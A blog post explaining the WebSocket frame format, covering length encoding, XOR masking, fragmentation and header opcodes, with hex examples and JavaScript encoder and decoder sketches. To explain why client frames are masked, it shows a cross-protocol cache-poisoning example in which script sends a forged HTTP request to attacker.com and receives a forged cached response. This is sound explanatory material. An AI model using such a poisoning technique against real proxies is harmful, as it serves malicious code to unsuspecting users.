The WebSocket protocol explained

WebSockets are great: they provide a persistent two-way communication channel over a single TCP connection. They allow for real-time data exchange, so they're used in chat apps, collaborative tools, and some AI APIs, among other things.

I recently wrote a WebSocket parser for Subtrace, and was surprised at how simple the (base) protocol is. The RFC felt almost... readable. The message format does just what it needs to do, and no more.

If you just want to play around with a WebSocket encoder, there's one at the bottom of the page.

WebSocket communication is built on a simple structure: both sides of the connection exchange messages, and each message is made up of one or more frames. Let's start by assuming messages are just single frames, and we'll build from there.

The basics

Here's a simple (but valid!) WebSocket message that says "Hello":

81                header
05                len
48 65 6c 6c 6f    payload

Ignoring the header byte (we'll get to it later), this is literally just the message length (5) followed by the payload ("Hello" in UTF-8). Simple, right?
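Here's a minimal sketch of that layout in JavaScript. It only handles the simplest case: an unmasked, single-frame text message whose payload fits in the one length byte (at most 125 bytes; longer payloads are covered under Bigger Frames). The names encodeShortTextFrame and toHex are made up for illustration and aren't part of any library.

```javascript
// Sketch: encode an unmasked, single-frame text message with a short payload.
// encodeShortTextFrame and toHex are hypothetical helper names.
function encodeShortTextFrame(text) {
  const payload = new TextEncoder().encode(text); // UTF-8 bytes
  if (payload.length > 125) {
    throw new RangeError("payload too long for the single length byte");
  }
  const frame = new Uint8Array(2 + payload.length);
  frame[0] = 0x81;           // header byte (explained later in the article)
  frame[1] = payload.length; // mask bit 0, followed by the 7-bit length
  frame.set(payload, 2);     // payload starts right after the two header bytes
  return frame;
}

// Format bytes as space-separated lowercase hex, like the diagrams above.
function toHex(bytes) {
  return Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join(" ");
}

console.log(toHex(encodeShortTextFrame("Hello"))); // 81 05 48 65 6c 6c 6f
```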

Okay, the full story is a bit more than that.

Masking

A WebSocket client MUST mask (scramble) every frame it sends to the server. If you're like me and you're wondering how "client" and "server" apply to WebSockets: the client initiates the connection with an HTTP request, and the server responds with a 101 Switching Protocols before the connection upgrades to WebSocket.

Masking requires a 4-byte masking key, so let's use a1 b2 c3 d4. Here's what our "Hello" message looks like now:

81                header
85                mask+len
a1 b2 c3 d4       masking key
e9 d7 af b8 ce    masked payload

The masked payload is obtained by XORing the original payload "Hello" with the masking key one byte at a time, repeating the masking key as necessary.

"Hello"           48  65  6c  6c  6f
Masking key       a1  b2  c3  d4  a1
Masked payload    e9  d7  af  b8  ce
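
The XOR step is short enough to sketch directly. This is an illustrative helper (maskPayload is a made-up name), not code from any particular library. Because XOR is its own inverse, the same function both masks and unmasks.

```javascript
// Sketch: XOR each payload byte with the masking key, cycling through the 4 key bytes.
// maskPayload is a hypothetical helper name.
function maskPayload(payload, key) {
  if (key.length !== 4) {
    throw new RangeError("masking key must be exactly 4 bytes");
  }
  const out = new Uint8Array(payload.length);
  for (let i = 0; i < payload.length; i++) {
    out[i] = payload[i] ^ key[i % 4]; // key repeats every 4 bytes
  }
  return out;
}

const maskingKey = Uint8Array.of(0xa1, 0xb2, 0xc3, 0xd4);
const helloBytes = new TextEncoder().encode("Hello");
const maskedBytes = maskPayload(helloBytes, maskingKey);

console.log(Array.from(maskedBytes, (b) => b.toString(16).padStart(2, "0")).join(" "));
// e9 d7 af b8 ce

// Applying the same key again recovers the original payload.
console.log(new TextDecoder().decode(maskPayload(maskedBytes, maskingKey))); // Hello
```
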
But why MUST client → server messages be masked?

It's a bit kludgy, but it was a safety measure against cross-protocol attacks back when WebSockets were relatively new.

Imagine attacker.com opens a WebSocket connection from the user's browser to its own server. It then sends a WebSocket message that looks like an HTTP GET request:

// on the user's browser
const socket = new WebSocket("ws://attacker.com");
socket.onopen = () => socket.send(
  "GET /jquery.min.js HTTP/1.1\r\n" +
  "Host: cdn.jquery.com\r\n" +
  "User-Agent: Mozilla/5.0\r\n" +
  "Accept: */*\r\n" +
  "Connection: keep-alive\r\n\r\n"
);

If there's no masking, these bytes are sent verbatim over the wire by the browser. If a caching proxy sits in between and doesn't parse WebSocket traffic correctly, it treats these bytes as a legitimate HTTP request.

Now attacker.com sends back a WebSocket message that looks like an HTTP response:

HTTP/1.1 200 OK
Content-Type: application/javascript
Content-Length: 1337
Cache-Control: public, max-age=86400

alert('pwned');

The proxy caches this since it looks like a valid HTTP response. The next time a user requests cdn.jquery.com/jquery.min.js, they are served the malicious version from the cache.

To prevent this, each client → server frame is masked with a different randomly generated key. Since the attacker can't predict the key, it can't control which bytes end up on the wire, so HTTP proxies won't accidentally interpret them as anything else.

That being said, masking is less critical than it used to be:

  • HTTPS is a lot more widespread now, and the encryption prevents proxies from looking inside your traffic.
  • Modern proxies are WebSocket aware, and don't try to parse WebSocket messages as anything else.

(Note that server → client frames aren't masked, since this risk only exists in browser-initiated traffic. In fact, server → client frames MUST NOT be masked.)

Notice that the second byte went from 05 to 85 even though the length of the message hasn't changed. It turns out the most significant bit (MSB) of this byte tells us whether the payload is masked. The remaining 7 bits give us the payload length.
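
Splitting that byte apart is a couple of bit operations. A small sketch, with parseSecondByte as a made-up name:

```javascript
// Sketch: split the second byte of a frame into the mask bit and the 7-bit value.
// parseSecondByte is a hypothetical helper name.
function parseSecondByte(byte) {
  return {
    masked: (byte & 0x80) !== 0, // most significant bit
    val: byte & 0x7f,            // remaining 7 bits
  };
}

console.log(JSON.stringify(parseSecondByte(0x05))); // {"masked":false,"val":5}
console.log(JSON.stringify(parseSecondByte(0x85))); // {"masked":true,"val":5}
```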

Well, kind of.

Bigger Frames

Using 7 bits for the payload length allows us to specify a payload that's at most 127 bytes. What if we need more than that?

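Let's call that 7-bit integer val (so the full byte is mask+val). Depending on what val is, there are different ways to represent the payload length:

val       Payload length
0-125     val itself
126       the next 2 bytes, read as a 16-bit unsigned integer
127       the next 8 bytes, read as a 64-bit unsigned integer (whose MSB must be 0)

The extended lengths are in network byte order (big-endian).

This means you could technically encode a 2^63-1 byte (about 9.2 exabytes) message in one single frame. But you'll pretty much never see such large messages in practice, since most WebSocket libraries buffer entire messages in memory. Besides, there are other ways to encode long messages.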
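
To make the three cases concrete, here's a rough sketch of how an encoder might write the length field, following RFC 6455: values up to 125 go directly in val, 126 means a 16-bit length follows, and 127 means a 64-bit length follows, both big-endian. The name encodeLengthField is made up, and this sketch only accepts lengths that fit in a JavaScript safe integer (2^53-1), well short of the protocol's limit.

```javascript
// Sketch: encode the mask bit plus payload length as 1, 3, or 9 bytes.
// encodeLengthField is a hypothetical helper name.
function encodeLengthField(length, masked) {
  if (!Number.isSafeInteger(length) || length < 0) {
    throw new RangeError("length must be a non-negative safe integer");
  }
  const maskBit = masked ? 0x80 : 0x00;
  if (length <= 125) {
    return Uint8Array.of(maskBit | length); // val is the length itself
  }
  if (length <= 0xffff) {
    const out = new Uint8Array(3);
    out[0] = maskBit | 126;
    new DataView(out.buffer).setUint16(1, length); // DataView is big-endian by default
    return out;
  }
  const out = new Uint8Array(9);
  out[0] = maskBit | 127;
  new DataView(out.buffer).setBigUint64(1, BigInt(length)); // also big-endian
  return out;
}

const hex = (bytes) => Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join(" ");
console.log(hex(encodeLengthField(5, true)));      // 85
console.log(hex(encodeLengthField(126, false)));   // 7e 00 7e
console.log(hex(encodeLengthField(65536, false))); // 7f 00 00 00 00 00 01 00 00
```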

Fragmentation, Flags, and Frames

As mentioned earlier, WebSocket messages can span multiple frames. When that happens, the individual payloads from each frame are concatenated to get the complete message. For example, if a WebSocket client receives these two frames in this order:

Frame 1:
01                   header
06                   mask+len
48 65 6c 6c 6f 20    payload ("Hello ")

Frame 2:
80                   header
06                   mask+len
77 6f 72 6c 64 21    payload ("world!")

The client reads a single message: "Hello world!". This also works with masked frames: just unmask each payload before concatenating.
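
A sketch of the concatenation step, assuming the payloads have already been extracted (and unmasked, if needed) from each frame. The name assembleTextMessage is made up. One design choice worth noting: the bytes are joined first and decoded once at the end, since a multi-byte UTF-8 character can be split across two frames.

```javascript
// Sketch: join the payloads of a fragmented text message, then decode as UTF-8.
// assembleTextMessage is a hypothetical helper name; payloads is an array of Uint8Array.
function assembleTextMessage(payloads) {
  const total = payloads.reduce((sum, p) => sum + p.length, 0);
  const message = new Uint8Array(total);
  let offset = 0;
  for (const payload of payloads) {
    message.set(payload, offset); // copy this fragment after the previous one
    offset += payload.length;
  }
  return new TextDecoder().decode(message);
}

const fragment1 = Uint8Array.of(0x48, 0x65, 0x6c, 0x6c, 0x6f, 0x20); // "Hello "
const fragment2 = Uint8Array.of(0x77, 0x6f, 0x72, 0x6c, 0x64, 0x21); // "world!"
console.log(assembleTextMessage([fragment1, fragment2])); // Hello world!
```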

If a message can have multiple frames, what dictates its boundaries? It's finally time to talk about that header byte. Let's look at the structure of the header, using the headers from the two frames above as examples:

header    FIN    RSV1    RSV2    RSV3    opcode
01        0      0       0       0       0001
80        1      0       0       0       0000

FIN: If set, this is the final frame in a message. This is how message boundaries are determined.

RSV1, RSV2, RSV3: These three bits are "reserved." They're all 0 in most normal WebSocket traffic. We'll ignore these for now but maybe return to them another day when we talk about compression.

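Opcode: These 4 bits tell us what kind of frame this is. In the two frames above, 0001 marks a text frame and 0000 marks a continuation frame, which carries on the message started by an earlier frame.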
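
Here's a small sketch that pulls those fields out of a header byte. The function and table names are made up; the opcode values listed are the ones defined in RFC 6455.

```javascript
// Opcodes defined by RFC 6455 (the remaining values are reserved).
const OPCODE_NAMES = {
  0x0: "continuation",
  0x1: "text",
  0x2: "binary",
  0x8: "close",
  0x9: "ping",
  0xa: "pong",
};

// Sketch: split the first byte of a frame into its flags and opcode.
// parseHeaderByte is a hypothetical helper name.
function parseHeaderByte(byte) {
  return {
    fin: (byte & 0x80) !== 0,
    rsv1: (byte & 0x40) !== 0,
    rsv2: (byte & 0x20) !== 0,
    rsv3: (byte & 0x10) !== 0,
    opcode: byte & 0x0f,
  };
}

for (const byte of [0x01, 0x80]) {
  const header = parseHeaderByte(byte);
  console.log(`FIN=${header.fin ? 1 : 0} opcode=${OPCODE_NAMES[header.opcode]}`);
}
// FIN=0 opcode=text
// FIN=1 opcode=continuation
```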

And that's (almost) all there is to it! There's more to talk about like compression and how a WebSocket connection is even established, but we'll leave those for another time.
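
Putting the pieces from the sections above together, a single-frame decoder might look roughly like this. It's a sketch under a few assumptions: the whole frame is already in the buffer, the length fits in a JavaScript safe integer, and compression and control-frame rules are ignored. The name decodeFrame and the shape of the returned object are made up for illustration.

```javascript
// Sketch: decode one complete WebSocket frame from a Uint8Array.
// decodeFrame is a hypothetical helper name.
function decodeFrame(bytes) {
  if (bytes.length < 2) throw new RangeError("incomplete frame");
  const view = new DataView(bytes.buffer, bytes.byteOffset, bytes.byteLength);

  const fin = (bytes[0] & 0x80) !== 0;
  const opcode = bytes[0] & 0x0f;
  const masked = (bytes[1] & 0x80) !== 0;
  let length = bytes[1] & 0x7f;
  let offset = 2;

  if (length === 126) {
    length = view.getUint16(offset); // 16-bit big-endian length
    offset += 2;
  } else if (length === 127) {
    const big = view.getBigUint64(offset); // 64-bit big-endian length
    if (big > BigInt(Number.MAX_SAFE_INTEGER)) {
      throw new RangeError("frame too large for this sketch");
    }
    length = Number(big);
    offset += 8;
  }

  let key = null;
  if (masked) {
    key = bytes.subarray(offset, offset + 4);
    offset += 4;
  }
  if (bytes.length < offset + length) throw new RangeError("incomplete frame");

  const payload = bytes.slice(offset, offset + length); // copy, so unmasking won't touch the input
  if (key) {
    for (let i = 0; i < payload.length; i++) payload[i] ^= key[i % 4];
  }
  return { fin, opcode, masked, payload, frameLength: offset + length };
}

const maskedHello = Uint8Array.of(
  0x81, 0x85, 0xa1, 0xb2, 0xc3, 0xd4, 0xe9, 0xd7, 0xaf, 0xb8, 0xce
);
console.log(new TextDecoder().decode(decodeFrame(maskedHello).payload)); // Hello
```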

Play around!

Generate your own WebSocket frames. Tap or hover over each set of bytes to see what they represent.

Note: I didn't cover compression here, but you can toggle it below to see how it affects things. As you might expect, it's most effective on compressible payloads like repeated strings.